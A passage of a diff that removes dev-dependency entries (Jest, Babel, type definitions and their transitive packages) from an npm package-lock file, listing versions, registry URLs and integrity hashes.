"https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "20.4.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", - "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "requires": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "requires": { - "fill-range": "^7.0.1" - } - }, - "browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true - }, - "electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", 